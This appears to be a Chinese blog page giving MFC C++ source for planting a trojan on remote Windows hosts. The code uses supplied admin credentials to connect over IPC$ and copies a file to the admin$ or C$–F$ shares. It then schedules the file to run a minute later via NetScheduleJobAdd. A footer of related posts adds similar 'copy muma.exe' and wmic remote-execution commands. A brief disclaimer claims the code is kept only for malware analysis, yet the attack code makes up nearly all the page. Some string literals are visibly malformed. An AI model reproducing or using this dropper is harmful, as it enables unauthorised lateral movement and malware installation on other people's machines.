要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////

typedef struct TagHost

{

CString host;

CString user;

CString pass;

CString filename;

CString LocalFilePath;

CListBox* list;

}IPC;

void CShareDlg::OnStart() //启动线程序

{

  UpdateData(TRUE);

  IPC* ipc = new IPC;

  ipc->host = m_host;

  ipc->user = m_user;

  ipc->pass = m_pass;

  ipc->LocalFilePath = m_localfile;

  ipc->filename = filename;

  ipc->list = &m_list;

  AfxBeginThread(ThreadIpcConnect,ipc);

}

/////////////////////////////线程/////////////////////////////////////////////////////

UINT ThreadIpcConnect(LPVOID lpvoid)

{

  IPC* ipc;

  CListBox* list;

  ipc = (IPC*)lpvoid;

  CString host;

  CString admin;

  CString pass;

  CString filename;

  CString localfilepath;

  host = ipc->host ;

  pass = ipc->pass;

  admin = ipc->user;

  localfilepath = ipc->LocalFilePath;

  filename =ipc->filename ;

list = ipc->list;

  BOOL IpcConnect;

  LPTIME_OF_DAY_INFO TimeBuf=NULL;

  NET_API_STATUS Status;

  CString RemoteFilePath,CmdCom("admin$\");

///////////////////////////////IPC连接////////////////////////////////////////////////////////////////

  NETRESOURCE ns;

  TCHAR buf[MAX_PATH];

  wsprintf(buf,"\\%s\ipc$",host);

  ZeroMemory(&ns,sizeof(ns));

  ns.dwScope=RESOURCE_GLOBALNET;

  ns.dwType=RESOURCETYPE_ANY;

  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;

  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;

  ns.lpLocalName="";

  ns.lpRemoteName=buf;

  ns.lpProvider=NULL;

  ns.lpComment=NULL;

  CString hhost = host;

  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);

///建立IPC连接

  if(IpcConnect)

  {

//连接成功后

///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////

    RemoteFilePath=("\\"+host+"\admin$\"+filename);

    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制

      if(!IpcConnect)

        {

          RemoteFilePath=("\\"+host+"\C$\"+filename);

          CmdCom="C:\"+filename;

          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

            if(!IpcConnect)

            {

               RemoteFilePath=("\\"+host+"\D$\"+filename);

               CmdCom="D:\"+filename;

               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

           if(!IpcConnect)

                  {

                     RemoteFilePath=("\\"+host+"\E$\"+filename);

                     CmdCom="E:\"+filename;

                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

                     if(!IpcConnect)

                       {

                        RemoteFilePath ("\\"+host+"\F$\"+filename);

                        CmdCom = "F:\"+filename;

                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);

                       }

                  }

              }

         }

///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////

         if(IpcConnect)

         {//获取远程主机时间

           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);

            if(Status==NERR_Success)

            {//活取时间成功

///////////////////////////启动目标文件///////////////////////////////////////////////////////////////

              DWORD day=1,JobTime;

              AT_INFO ai;

              day=day*2;

              ai.Command=CmdCom.AllocSysString();

              ai.DaysOfMonth=day;

              ai.DaysOfWeek=0;

              ai.Flags=JOB_NONINTERACTIVE;

              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;

              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);

              //启动上传的文件,一分钟后启动

              if(Status==NERR_Success)

              {

                list->AddString(host+"启动成功");

              }

              else

                list->AddString(host+"启动失败");

              }

          else

            {

             list->AddString(host+"获取时间失败");

            }

         }

         else

         {

          list->AddString(host+"拷贝文件失败");

         }

    }

    else

    list->AddString(host+"连接失败");

return TRUE;

}

 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马的更多相关文章

  1. IPC$横向渗透代码实现

    思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网 ...

  2. 一个DDOS木马后门病毒的分析

    http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63 ...

  3. 内网IPC$种马的三种方法

    copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:adminis ...

  4. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  5. 域渗透:IPC$ 命名管道

    介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接 ...

  6. linux端口详解

    Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 ...

  7. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  8. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  9. port与大全portClose方法

    在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义p ...

随机推荐

  1. .NET:一微秒内可能执行多条 DateTime.Now

    出现BUG的上下文 自己写的工作流引擎出现了一点问题,就是因为可能存在一个请求同时流转两个节点(不必深究这个问题),因为每个节点都有一个“进入时间”,引擎的实现将最后一个“进入时间“对应的节点当作了” ...

  2. tomcat8.0.15+spring4.1.2的集群下共享WebSocketSession?

    环境:nginx+Tomcat服务器 A B C   问题:如果用户 1 访问由服务器 A socket服务  ,用户2 由服务器 C socket服务  ,此时如果用户 1, 2 想通过  sock ...

  3. cocos2d-x中使用CCOrbitCamera做水平翻转

    项目中需要用到水平翻转效果,这里偷懒了-   首先翻转,它只是转到了180度,多了就觉得很奇怪了. 所以这里设定就是先从0 ~ 90度,然后再从270 ~ 360,90 – 270 视觉上是感觉不到变 ...

  4. REQUEST_TIMEOUT 解决方案

    you need to pass an npmrc file when you install the business network onto the peers. For more info s ...

  5. 支付宝 iphone6 指纹验证失败

    重启 iphone6  就可以了. 再次打开 支付宝 那个 指纹功能,就有一个弹出框 可以按指纹了.

  6. verilog语法实例学习(2)

    Verilog中的信号类型 线网类型 线网类型表示一个或多个门或者其它类型的信号源驱动的硬件连线.如果没有驱动源,则线网的默认值为z.verilog中定义的线网类型有以下几种:     wire,tr ...

  7. [数学] 将长为L的木棒随机折成3段,则3段构成三角形的概率

    1.题目 如题,将长为L的木棒随机折成3段,则3段构成三角形的概率是多少? 2.解析 这个与其说是编程题目,倒不如说是个数学题目.可能是你没有见过,或者没有过这种解题思想.(还是那句,一回生两回熟,类 ...

  8. Commands to help you to Start Using ScaleIO Storage

    To start using your storage: Log in to the MDM: scli --login --username admin --password <passwor ...

  9. 领扣-120 三角形最小路径和 Triangle MD

    三角形最小路径和 Triangle 数组 动态规划 问题 给定一个三角形,找出自顶向下的最小路径和.每一步只能移动到下一行中相邻的结点上. 例如,给定三角形: [2], [3,4], [6,5,7], ...

  10. [VS2010搭建汇编开发环境win32和x64]

    场景: 1. 虽然使用MASM32也可以编译运行汇编程序,但是既然装了VS2010,它也能支持编译运行汇编吧.不然微软的开发人员难道还不用vs写汇编程序了? http://www.masm32.com ...